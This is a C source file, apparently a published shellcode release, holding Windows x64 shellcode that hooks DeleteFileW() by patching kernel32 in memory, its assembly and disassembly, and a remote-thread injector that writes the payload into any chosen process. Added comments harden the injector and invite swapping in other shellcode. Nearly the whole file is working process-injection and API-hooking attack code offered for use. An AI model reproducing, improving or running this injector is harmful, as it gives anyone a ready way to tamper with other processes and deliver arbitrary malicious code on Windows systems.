/* # Title : Windows x64 API Hooking Shellcode # Author : Roziul Hasan Khan Shifat # Size : 117 bytes # Date : 16/10/2017 # Email : shifath12@gmail.com # Tested On : Windows 7 Ultimate x64 */ /* This shellcode hooks the DeleteFileW() API. Warning: Do not use this shellcode on explorer.exe; otherwise you will not be able to delete files from the Recycle Bin. Note: VirtualProtect() and DeleteFileW() are located by hard-coded offsets (0x29f0 and 0xa2b0) from the kernel32.dll base, so the shellcode only works against the kernel32.dll build it was tested on; on any other build the hook is written into the wrong code. */ /* section .text global _start _start: xor rdx,rdx mov rax,[gs:rdx+0x60] ;PPEB mov rax,[rax+24] ;PPEB->Ldr mov rsi,[rax+32] ;Ldr->InMemoryOrderModuleList.Flink mov rax,[rsi] mov rsi,[rax] mov rdi,[rsi+32] ;rdi=kernel32.dll base Address ;--------------------------------------------------------------- xor rsi,rsi mov si,0x29f0 add rsi,rdi ;rsi=VirtualProtect() ;---------------------------------- ;This Part is Important xor r12,r12 mov r12w,0xa2b0 ;0x0000a2b0 is the offset of DeleteFileW() from the kernel32.dll base add r12,rdi ;r12=DeleteFileW() ;--------------------------------------------------- ;Changing memory attribute mov rcx,r12 push rdx mov dl,9 pop r8 mov r8b,0x40 sub rsp,4 lea r14,[rsp] mov r9,r14 call rsi ;-------------------------------------------------------- mov [r12],byte 0xe9 jmp shellcode inj: pop rdx sub rdx,r12 sub rdx,5 mov [r12+1],rdx xor rdx,rdx mov dl,9 mov rcx,r12 mov r8d,dword [r14] mov r9,r14 call rsi add rsp,4 ret shellcode: call inj ;This is My own shellcode db
0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3 */ /* apiint.obj: file format pe-x86-64 Disassembly of section .text: 0000000000000000 <_start>: 0: 48 31 d2 xor %rdx,%rdx 3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax 8: 48 8b 40 18 mov 0x18(%rax),%rax c: 48 8b 70 20 mov 0x20(%rax),%rsi 10: 48 8b 06 mov (%rsi),%rax 13: 48 8b 30 mov (%rax),%rsi 16: 48 8b 7e 20 mov 0x20(%rsi),%rdi 1a: 48 31 f6 xor %rsi,%rsi 1d: 66 be f0 29 mov $0x29f0,%si 21: 48 01 fe add %rdi,%rsi 24: 4d 31 e4 xor %r12,%r12 27: 66 41 bc b0 a2 mov $0xa2b0,%r12w 2c: 49 01 fc add %rdi,%r12 2f: 4c 89 e1 mov %r12,%rcx 32: 52 push %rdx 33: b2 09 mov $0x9,%dl 35: 41 58 pop %r8 37: 41 b0 40 mov $0x40,%r8b 3a: 48 83 ec 04 sub $0x4,%rsp 3e: 4c 8d 34 24 lea (%rsp),%r14 42: 4d 89 f1 mov %r14,%r9 45: ff d6 callq *%rsi 47: 41 c6 04 24 e9 movb $0xe9,(%r12) 4c: eb 22 jmp 70 000000000000004e : 4e: 5a pop %rdx 4f: 4c 29 e2 sub %r12,%rdx 52: 48 83 ea 05 sub $0x5,%rdx 56: 49 89 54 24 01 mov %rdx,0x1(%r12) 5b: 48 31 d2 xor %rdx,%rdx 5e: b2 09 mov $0x9,%dl 60: 4c 89 e1 mov %r12,%rcx 63: 45 8b 06 mov (%r14),%r8d 66: 4d 89 f1 mov %r14,%r9 69: ff d6 callq *%rsi 6b: 48 83 c4 04 add $0x4,%rsp 6f: c3 retq 0000000000000070 : 70: e8 d9 ff ff ff callq 4e 75: 48 31 d2 xor %rdx,%rdx 78: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax 7d: 48 8b 40 18 mov 0x18(%rax),%rax 
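81: 48 8b 70 20 mov 0x20(%rax),%rsi 85: 48 8b 06 mov (%rsi),%rax 88: 48 8b 30 mov (%rax),%rsi 8b: 48 8b 7e 20 mov 0x20(%rsi),%rdi 8f: 68 90 65 01 0a pushq $0xa016590 94: 80 74 24 03 0a xorb $0xa,0x3(%rsp) 99: 5b pop %rbx 9a: 48 01 fb add %rdi,%rbx 9d: 52 push %rdx 9e: 52 push %rdx 9f: 48 b8 75 73 65 72 33 movabs $0x642e323372657375,%rax a6: 32 2e 64 a9: 48 89 04 24 mov %rax,(%rsp) ad: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp) b4: 48 8d 0c 24 lea (%rsp),%rcx b8: 48 83 ec 58 sub $0x58,%rsp bc: ff d3 callq *%rbx be: 68 b8 12 07 0a pushq $0xa0712b8 c3: 80 74 24 03 0a xorb $0xa,0x3(%rsp) c8: 5b pop %rbx c9: 48 01 c3 add %rax,%rbx cc: 48 31 c9 xor %rcx,%rcx cf: 6a 10 pushq $0x10 d1: 41 59 pop %r9 d3: 51 push %rcx d4: 51 push %rcx d5: 48 ba 41 50 49 20 42 movabs $0x636f6c4220495041,%rdx dc: 6c 6f 63 df: 48 89 14 24 mov %rdx,(%rsp) e3: c7 44 24 08 6b 65 64 movl $0x2164656b,0x8(%rsp) ea: 21 eb: 48 8d 14 24 lea (%rsp),%rdx ef: 52 push %rdx f0: 41 58 pop %r8 f2: 48 83 ec 58 sub $0x58,%rsp f6: 48 83 ec 58 sub $0x58,%rsp fa: ff d3 callq *%rbx fc: 90 nop fd: 48 31 d2 xor %rdx,%rdx 100: 66 ba 28 01 mov $0x128,%dx 104: 48 01 d4 add %rdx,%rsp 107: c3 retq */

/* Win32 process/memory/thread APIs, the ToolHelp snapshot API used to list
 * processes, and printf()/scanf(). */
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>

/*
 * Payload written into the target process (see the listing above).
 *
 * Two parts, concatenated:
 *  1. The 117-byte interceptor (offsets 0x00-0x74).  It walks the PEB to the
 *     third module in InMemoryOrderModuleList and takes that as the
 *     kernel32.dll base, adds the hard-coded offsets 0x29f0 (VirtualProtect)
 *     and 0xa2b0 (DeleteFileW) to it, makes 9 bytes of DeleteFileW()
 *     writable (0x40 = PAGE_EXECUTE_READWRITE), writes 0xe9 followed by the
 *     displacement to part 2, then restores the saved protection.  Note the
 *     displacement store is an 8-byte `mov [r12+1],rdx`, so DeleteFileW()'s
 *     bytes 5..8 are clobbered as well, and only the low 32 bits form the
 *     `jmp rel32`: part 2 must lie within +/-2 GiB of DeleteFileW().
 *  2. The author's demo payload (0x75-0x107).  It also relies on fixed
 *     offsets: 0x16590 from the kernel32 base, then 0x712b8 from the value
 *     returned by that first call, passing "user32.dll" and "API Blocked!"
 *     -- presumably LoadLibraryA()/MessageBoxA(), but the names are not in
 *     this file.  It finishes with `add rsp,0x128; ret`, returning straight
 *     to DeleteFileW()'s caller; the real DeleteFileW() never runs.
 *
 * All of these offsets match only the DLL builds the author tested on
 * (Windows 7 Ultimate x64).  On any other build the hook lands in the wrong
 * code and will most likely crash the target.
 */
unsigned char shellcode[] =
    /* Part 1: interceptor */
    "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x48\x31\xf6\x66\xbe\xf0\x29\x48\x01\xfe\x4d\x31\xe4\x66\x41\xbc\xb0\xa2\x49\x01\xfc\x4c\x89\xe1\x52\xb2\x09\x41\x58\x41\xb0\x40\x48\x83\xec\x04\x4c\x8d\x34\x24\x4d\x89\xf1\xff\xd6\x41\xc6\x04\x24\xe9\xeb\x22\x5a\x4c\x29\xe2\x48\x83\xea\x05\x49\x89\x54\x24\x01\x48\x31\xd2\xb2\x09\x4c\x89\xe1\x45\x8b\x06\x4d\x89\xf1\xff\xd6\x48\x83\xc4\x04\xc3\xe8\xd9\xff\xff\xff"
    /* Part 2: demo payload -- replace with your own position-independent code */
    "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x68\x90\x65\x01\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xfb\x52\x52\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x68\xb8\x12\x07\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xc3\x48\x31\xc9\x6a\x10\x41\x59\x51\x51\x48\xba\x41\x50\x49\x20\x42\x6c\x6f\x63\x48\x89\x14\x24\xc7\x44\x24\x08\x6b\x65\x64\x21\x48\x8d\x14\x24\x52\x41\x58\x48\x83\xec\x58\x48\x83\xec\x58\xff\xd3\x90\x48\x31\xd2\x66\xba\x28\x01\x48\x01\xd4\xc3";

/*
 * Injector: lists running processes, asks for a PID, copies `shellcode` into
 * that process and runs it on a new remote thread.  The shellcode then
 * patches the target's DeleteFileW(), so the remote pages are deliberately
 * left mapped on success (they are the live hook target).
 *
 * Returns 0 on success and 1 on any failure (the original returned 0 on
 * every path, so a caller could not tell the two apart).
 *
 * Fixes versus the original:
 *  - payload length is sizeof-based; strlen() on binary shellcode stops at
 *    the first 0x00 byte and would silently truncate a payload containing one;
 *  - scanf()'s result is checked and its format matches DWORD (%lu);
 *  - the process is opened with only the rights the calls below need rather
 *    than PROCESS_ALL_ACCESS;
 *  - pages are allocated RW and flipped to RX only after the write (W^X);
 *  - every Win32 call is checked, and the snapshot, thread and (on failure)
 *    the remote allocation are released.
 *
 * NOTE(review): the allocation below carries no address hint.  The hook is
 * a `jmp rel32`, so if the returned address ends up more than 2 GiB from
 * kernel32.dll in the target, the hook jumps to the wrong place -- cannot be
 * verified from this file; confirm on the system you test against.
 */
int main(void)
{
    HANDLE snap = INVALID_HANDLE_VALUE;
    HANDLE proc = NULL;
    HANDLE thread = NULL;
    LPVOID mem = NULL;
    PROCESSENTRY32 ps;
    DWORD old_protect = 0;
    DWORD pid = 0;
    int rc = 1;
    /* sizeof, not strlen(): the payload is binary. */
    const size_t len = sizeof shellcode - 1;
    /* Least privilege: VirtualAllocEx/VirtualProtectEx need VM_OPERATION,
     * WriteProcessMemory needs VM_WRITE, CreateRemoteThread needs
     * CREATE_THREAD | QUERY_INFORMATION | VM_OPERATION | VM_WRITE | VM_READ. */
    const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                         PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;

    ps.dwSize = sizeof(ps);
    snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) {
        printf("CreateToolhelp32Snapshot() Failed");
        return 1;
    }
    if (!Process32First(snap, &ps)) {
        printf("Process32First() Failed");
        CloseHandle(snap);
        return 1;
    }
    do {
        /* th32ProcessID is a DWORD (unsigned), so %lu rather than %ld. */
        printf("%s : %lu\n", ps.szExeFile, (unsigned long)ps.th32ProcessID);
    } while (Process32Next(snap, &ps));
    CloseHandle(snap);

    printf("\nEnter Process ID: ");
    if (scanf("%lu", &pid) != 1) {
        printf("Invalid Process ID");
        return 1;
    }

    proc = OpenProcess(access, FALSE, pid);
    if (!proc) {
        printf("Failed to Open Process");
        return 1;
    }

    /* W^X: writable first, executable only once the bytes are in place. */
    mem = VirtualAllocEx(proc, NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) {
        printf("Failed to allocate memory in process");
        goto out;
    }
    if (!WriteProcessMemory(proc, mem, shellcode, len, NULL)) {
        printf("Failed to write shellcode into process");
        goto out;
    }
    if (!VirtualProtectEx(proc, mem, len, PAGE_EXECUTE_READ, &old_protect)) {
        printf("Failed to make shellcode executable");
        goto out;
    }
    thread = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);
    if (!thread) {
        printf("Failed to create remote thread");
        goto out;
    }
    rc = 0;

out:
    /* On failure the remote pages are useless -- release them.  On success
     * they hold the hook target and must stay mapped. */
    if (rc != 0 && mem) {
        VirtualFreeEx(proc, mem, 0, MEM_RELEASE);
    }
    if (thread) {
        CloseHandle(thread);
    }
    CloseHandle(proc);
    return rc;
}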